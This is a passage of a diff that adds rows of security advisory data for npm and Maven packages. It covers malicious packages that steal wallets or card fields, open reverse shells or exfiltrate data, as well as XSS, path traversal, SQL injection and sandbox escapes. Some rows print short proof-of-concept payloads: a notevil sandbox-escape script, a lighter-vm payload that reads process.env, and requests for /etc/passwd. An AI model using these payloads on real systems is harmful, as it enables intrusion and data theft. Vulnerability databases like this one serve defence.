+If version 1.1.7 of this module is found installed you will want to replace it with a version before or after 1.1.7. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'impala'}, 'versions': ['1.1.7']}]","[{'type': 'PACKAGE', 'url': 'https://github.com/shenfw1987/impala'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-IMPALA-450989'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/628'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:28Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wmv4-5w76-vp9g,2021-10-04T21:18:23Z,2020-09-15T20:16:22Z,,['CVE-2014-3527'],Authorization Bypass in Spring Security,"When using Spring Security's CAS Proxy ticket authentication a malicious CAS Service could trick another CAS Service into authenticating a proxy ticket that was not associated. This is due to the fact that the proxy ticket authentication uses the information from the HttpServletRequest which is populated based upon untrusted information within the HTTP request.
+
+This means if there are access control restrictions on which CAS services can authenticate to one another, those restrictions can be bypassed.
+
+If users are not using CAS Proxy tickets and not basing access control decisions based upon the CAS Service, then there is no impact to users.
+
+## Mitigation
+Users of affected versions should apply the following mitigation:
+- Users of 3.2x should upgrade to 3.2.5 or later
+- Users of 3.1.x should upgrade to 3.1.7 or later
+
+## Credit
+This issue was identified by David Ohsie and brought to our attention by the CAS Development team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-3527'}, {'type': 'WEB', 'url': 'https://github.com/spring-projects/spring-security/issues/2907'}, {'type': 'PACKAGE', 'url': 'https://github.com/spring-projects/spring-security/'}, {'type': 'WEB', 'url': 'https://pivotal.io/security/cve-2014-3527'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-09-15T20:16:07Z', 'nvd_published_at': '2017-05-25T17:29:00Z'}"
+1.4.0,GHSA-gmjp-776j-2394,2021-10-01T21:04:56Z,2020-09-03T17:04:24Z,,[],Malicious Package in ripmed160,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ripmed160'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1405'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:58:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9qgh-7pgp-hp7r,2020-08-31T18:44:42Z,2020-09-03T17:10:31Z,,[],Cross-Site Scripting in graylog-web-interface,"All versions of `graylog-web-interface` are vulnerable to Cross-Site Scripting (XSS). The package fails to escape output on the `TypeAhead` and `QueryInput` components, which may allow attackers to execute arbitrary JavaScript on the victim's browser.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'graylog-web-interface'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1028'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fgp6-8g62-qx6w,2021-09-30T21:58:23Z,2020-09-03T17:01:45Z,,[],Malicious Package in smartsearchwp,"All versions of `smartsearchwp` contain malicious code. The package is malware intended to steal credentials from websites it is loaded in. It traverses DOM elements looking for fields such as `username` and `password` and uploads it to a remote server. The package also port-scans the local gateway and uploads the information to the remote server. It has a feature to fetch commands from the remote server and execute them with `eval`. The npm security team analysis found several bugs in the malware that prevent it from actually performing its actions. The malicious code is also not invoked upon installation or require; it would require transpiling TypeScript code and using it in a website.
+
+
+
+## Recommendation
+
+Remove the package from your environment. There is no indication of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'smartsearchwp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1011'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:01Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fpf2-pr3j-4cm3,2021-10-01T21:01:31Z,2020-09-03T17:06:06Z,,[],Malicious Package in ecruve,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ecruve'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1395'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j8hw-49gg-vq3w,2021-09-30T20:00:58Z,2020-09-03T17:45:41Z,,[],Malicious Package in retcodelog,"All versions of `retcodelog` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'retcodelog'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1061'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:45:51Z', 'nvd_published_at': None}"
+1.4.0,GHSA-9x64-5r7x-2q53,2021-10-01T13:30:04Z,2020-09-01T21:21:32Z,,[],Malicious Package in flatmap-stream,"Version 0.1.1 of `flatmap-stream` is considered malicious.
+
+This module runs an encrypted payload targeting a very specific application, `copay` and because they shared the same description it would have likely worked for `copay-dash`.
+
+The injected code:
+
+- Read in AES encrypted data from a file disguised as a test fixture
+- Grabbed the npm package description of the module that imported it, using an automatically set environment variable
+- Used the package description as a key to decrypt a chunk of data pulled in from the disguised file
+
+The decrypted data was part of a module, which was then compiled in memory and executed.
+
+This module performed the following actions:
+
+- Decrypted another chunk of data from the disguised file
+- Concatenated a small, commented prefix from the first decrypted chunk to the end of the second decrypted chunk
+- Performed minor decoding tasks to transform the concatenated block of code from invalid JS to valid JS (we believe this was done to evade detection by dynamic analysis tools)
+- Wrote this processed block of JS out to a file stored in a dependency that would be packaged by the build scripts:
+
+The chunk of code that was written out was the actual malicious code, intended to be run on devices owned by the end users of Copay.
+
+This code would do the following:
+
+- Detect the current environment: Mobile/Cordova/Electron
+- Check the Bitcoin and Bitcoin Cash balances on the victim's copay account
+- If the current balance was greater than 100 Bitcoin, or 1000 Bitcoin Cash:
+ - Harvest the victim's account data in full
+ - Harvest the victim's copay private keys
+ - Send the victim's account data/private keys off to a collection
+
+
+## Recommendation
+
+If you find this module in your environment it's best to remove it. The malicious version of event-stream and flatmap-stream have been removed from the npm Registry.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'flatmap-stream'}, 'versions': ['0.1.1']}]","[{'type': 'WEB', 'url': 'https://github.com/dominictarr/event-stream/issues/116'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/737'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:33:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m86m-5m44-pc93,2020-08-31T18:47:07Z,2020-09-03T19:05:46Z,,[],Denial of Service in grpc-ts-health-check,"Versions of `grpc-ts-health-check` prior to 2.0.0 are vulnerable to Denial of Service. The package exposes an API endpoint that may allow attackers to set the service's health status to failing. This can lead to Denial of Service as Kubernetes blocks traffic to services with a failing status.
+
+
+## Recommendation
+
+Upgrade to version 2.0.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'grpc-ts-health-check'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1097'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:07Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v4x8-gw49-7hv4,2020-08-31T18:49:54Z,2020-09-03T20:37:42Z,,[],Path Traversal in swagger-injector,"All versions of `swagger-injector` are vulnerable to Path Traversal. The package fails to sanitize URLs, allowing attackers to access server files outside of the configured `dist` folder using relative paths.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'swagger-injector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1172'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:49:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7f59-x49p-v8mq,2021-09-23T21:29:50Z,2020-09-01T15:28:45Z,,['CVE-2016-1000226'],Cross-Site Scripting in swagger-ui,"Affected versions of `swagger-ui` are vulnerable to cross-site scripting in both the `consumes` and `produces` parameters of the swagger JSON document for a given API.
+
+Additionally, `swagger-ui` allows users to load arbitrary swagger JSON documents via the query string parameter `url`, allowing an attacker to exploit this attack against any user that the attacker can convince to visit a crafted link.
+
+## Proof of Concept
+
+```
+http:///swagger-ui/index.html?url=http:///malicious-swagger-file.json
+````
+
+
+
+## Recommendation
+
+Update to version 2.2.1 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'swagger-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000226'}, {'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/issues/1866'}, {'type': 'WEB', 'url': 'https://github.com/swagger-api/swagger-ui/pull/1867'}, {'type': 'PACKAGE', 'url': 'https://github.com/swagger-api/swagger-ui'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/123'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:11:35Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4v9q-hm2p-68c4,2021-09-23T21:35:22Z,2020-09-01T15:57:01Z,,['CVE-2016-1000238'],Spoofing attack due to unvalidated KDC in node-krb5,"Affected versions of `node-krb5` do not validate the KDC prior to authenticating, which might allow an attacker with network access and enough time to spoof the KDC and impersonate a valid user without knowing their credentials.
+
+
+## Recommendation
+
+It appears that this will remain unfixed indefinitely, as the Github issue for this vulnerability has been open since 2015, with no work on it since then.
+
+At this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are [multiple modules fitting this criteria available on npm.](https://www.npmjs.com/search?q=kerberos).",[],"[{'package': {'ecosystem': 'npm', 'name': 'node-krb5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000238'}, {'type': 'WEB', 'url': 'https://github.com/qesuto/node-krb5/issues/13'}, {'type': 'PACKAGE', 'url': 'https://github.com/qesuto/node-krb5'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/136'}, {'type': 'WEB', 'url': 'http://archive.hack.lu/2010/Bouillon-Stealing-credentials-for-impersonation.pdf'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:12:06Z', 'nvd_published_at': None}"
+1.4.0,GHSA-r742-7j4h-hjr8,2021-10-01T17:07:41Z,2020-09-03T23:27:36Z,,[],Malicious Package in arsenic-tabasco-cyborg-peanut-butter,"All versions of `arsenic-tabasco-cyborg-peanut-butter` contain malicious code. The package downloads and runs a script that opens a reverse shell in the system.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'arsenic-tabasco-cyborg-peanut-butter'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1313'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:46Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hx78-272p-mqqh,2020-08-31T18:47:59Z,2020-09-03T19:21:11Z,,[],Authorization Bypass in graphql-shield,"Versions of `graphql-shield` prior to 6.0.6 are vulnerable to an Authorization Bypass. The rule caching option `no_cache` relies on keys generated by cryptographically insecure functions, which may cause rules to be incorrectly cached. This allows attackers to access information they should not have access to in case of a key collision.
+
+
+## Recommendation
+
+Upgrade to version 6.0.6 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'graphql-shield'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.6'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1121'}]","{'cwe_ids': ['CWE-285'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jp46-fw6c-3pm9,2023-09-13T20:24:34Z,2020-09-01T18:46:58Z,,['CVE-2017-16184'],Directory Traversal in scott-blanch-weather-app,"Affected versions of `scott-blanch-weather-app` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'scott-blanch-weather-app'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16184'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/scott-blanch-weather-app'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/453'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:23:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-226w-6hhj-69hp,2021-09-30T20:06:59Z,2020-09-03T19:06:52Z,,[],Malicious Package in cal_rd,"Version 0.1.1 of `rc_cal` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'cal_rd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1098'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v66p-w7qx-wv98,2020-08-31T18:59:44Z,2020-09-04T17:29:34Z,,[],Authentication Bypass in express-laravel-passport,"All versions of `express-laravel-passport` are vulnerable to an Authentication Bypass. The package fails to properly validate JWTs, allowing attackers to send HTTP requests impersonating other users.
+
+
+## Recommendation
+
+Upgrade to version 2.0.5 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'express-laravel-passport'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/748214'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1450'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:59:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-65m9-m259-7jqw,2021-10-04T21:06:12Z,2020-09-03T15:49:29Z,,[],Improper Authorization in react-oauth-flow,"All versions of `react-oauth-flow` fail to properly implement the OAuth protocol. The package stores secrets in the front-end code. Instead of using a public OAuth client, it uses a confidential client on the browser. This may allow attackers to compromise server credentials.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'react-oauth-flow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ethereum/web3.js/issues/2739'}, {'type': 'PACKAGE', 'url': 'https://github.com/ethereum/web3.js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1487'}]","{'cwe_ids': ['CWE-285'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T19:01:08Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fwvp-x5gj-773j,2023-07-27T20:35:13Z,2020-09-01T20:33:10Z,,[],Malicious Package in react-server-native,"Version 0.0.7 of `react-server-native` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+If version 0.0.7 of this module is found installed you will want to replace it with a version before or after 0.0.7. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 0.0.6",[],"[{'package': {'ecosystem': 'npm', 'name': 'react-server-native'}, 'versions': ['0.0.7']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/635'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:30:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7r5f-7qr4-pf6q,2020-08-31T18:47:00Z,2020-09-03T19:03:33Z,,[],Sandbox Breakout / Arbitrary Code Execution in notevil,"Versions of `notevil` prior to 1.3.2 are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to prevent access to the `Function` constructor by not checking the return values of function calls. This allows attackers to access the Function prototype's constructor leading to the Sandbox Escape. An example payload is:
+```
+var safeEval = require('notevil')
+var input = """" +
+""function fn() {};"" +
+""var constructorProperty = Object.getOwnPropertyDescriptors(fn.__proto__).constructor;"" +
+""var properties = Object.values(constructorProperty);"" +
+""properties.pop();"" +
+""properties.pop();"" +
+""properties.pop();"" +
+""var Function = properties.pop();"" +
+""(Function('return this'))()"";
+safeEval(input)```
+
+
+## Recommendation
+
+Upgrade to version 1.3.2 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'notevil'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1093'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-q3vw-4jx3-rrr2,2022-09-19T22:54:00Z,2020-09-23T17:20:09Z,,[],personnummer/java vulnerable to Improper Input Validation,"This vulnerability was reported to the personnummer team in June 2020. The slow response was due to locked ownership of some of the affected packages, which caused delays to update packages prior to disclosure.
+
+The vulnerability is determined to be low severity.
+
+### Impact
+
+This vulnerability impacts users who rely on the for last digits of personnummer to be a _real_ personnummer.
+
+### Patches
+
+The issue have been patched in all repositories. The following versions should be updated to as soon as possible:
+
+[C#](https://github.com/advisories/GHSA-qv8q-v995-72gr) 3.0.2
+D 3.0.1
+[Dart](https://github.com/advisories/GHSA-4xh4-v2pq-jvhm) 3.0.3
+Elixir 3.0.0
+[Go](https://github.com/advisories/GHSA-hv53-vf5m-8q94) 3.0.1
+[Java](https://github.com/advisories/GHSA-q3vw-4jx3-rrr2) 3.3.0
+[JavaScript](https://github.com/advisories/GHSA-vpgc-7h78-gx8f) 3.1.0
+Kotlin 1.1.0
+Lua 3.0.1
+[PHP](https://github.com/advisories/GHSA-2p6g-gjp8-ggg9) 3.0.2
+Perl 3.0.0
+[Python](https://github.com/advisories/GHSA-rxq3-5249-8hgg) 3.0.2
+[Ruby](https://github.com/advisories/GHSA-vp9c-fpxx-744v) 3.0.1
+[Rust](https://github.com/advisories/GHSA-28r9-pq4c-wp3c) 3.0.0
+Scala 3.0.1
+Swift 1.0.1
+
+If you are using any of the earlier packages, please update to latest.
+
+### Workarounds
+
+The issue arrieses from the regular expression allowing the first three digits in the last four digits of the personnummer to be
+000, which is invalid. To mitigate this without upgrading, a check on the last four digits can be made to make sure it's not
+000x.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Open an issue in [Personnummer Meta](https://github.com/personnummer/meta/issues)
+* Email us at [Personnummer Email](mailto:security@personnummer.dev)",[],"[{'package': {'ecosystem': 'Maven', 'name': 'dev.personnummer:personnummer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/personnummer/java/security/advisories/GHSA-q3vw-4jx3-rrr2'}, {'type': 'WEB', 'url': 'https://github.com/personnummer/java/commit/3bad4e3354503d7cfd443257c94c41f57b3d1621'}, {'type': 'PACKAGE', 'url': 'https://github.com/personnummer/java/'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-09-23T17:15:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-cxwc-8pqp-2whw,2023-09-07T00:11:18Z,2020-09-01T18:20:40Z,,['CVE-2017-16197'],Directory Traversal in qinserve,"Affected versions of `qinserve` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.",[],"[{'package': {'ecosystem': 'npm', 'name': 'qinserve'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16197'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/qinserve'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/434'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:22:59Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8hrq-9wm7-v3jw,2021-09-29T20:53:26Z,2020-09-03T21:39:41Z,,[],Malicious Package in btffer-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'btffer-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1231'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c3hq-7mxh-mqxf,2020-08-31T18:54:55Z,2020-09-04T14:59:50Z,,[],Sandbox Breakout / Arbitrary Code Execution in lighter-vm,"All versions of `lighter-vm` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through `this.constructor.constructor` . This may allow attackers to execute arbitrary code in the system. Evaluating the payload `this.constructor.constructor('return process.env')()` prints the contents of `process.env`.
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'lighter-vm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1317'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:54:55Z', 'nvd_published_at': None}"
+1.4.0,GHSA-5v9h-q3gj-c32x,2021-09-23T21:29:13Z,2020-09-01T15:27:40Z,,['CVE-2016-1000225'],SQL Injection via GeoJSON in sequelize,"Affected versions of `sequelize` are vulnerable to SQL Injection in Models that have fields with the `GEOMETRY` DataType. This vulnerability occurs because single quotes in document values are not escaped for GeoJSON documents using `ST_GeomFromGeoJSON`, and MySQL GeoJSON documents using `GeomFromText`.
+
+
+## Recommendation
+
+Update to version 3.23.6 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'sequelize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.23.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000225'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/issues/6194'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/pull/6302'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/pull/6306'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/commit/14e3deaf3ad27f12900e5275db1d448844c9de3e'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/commit/18ac91040d9c57351d26ba998f460e214255b704'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/commit/562d52585902090f4e53eb21c61314098c29d795'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/commit/f93af43a1d86400487f5e3d9762f1a4b7cf6b1e1'}, {'type': 'PACKAGE', 'url': 'https://github.com/sequelize/sequelize'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:sequelize:20160718'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:11:32Z', 'nvd_published_at': None}"
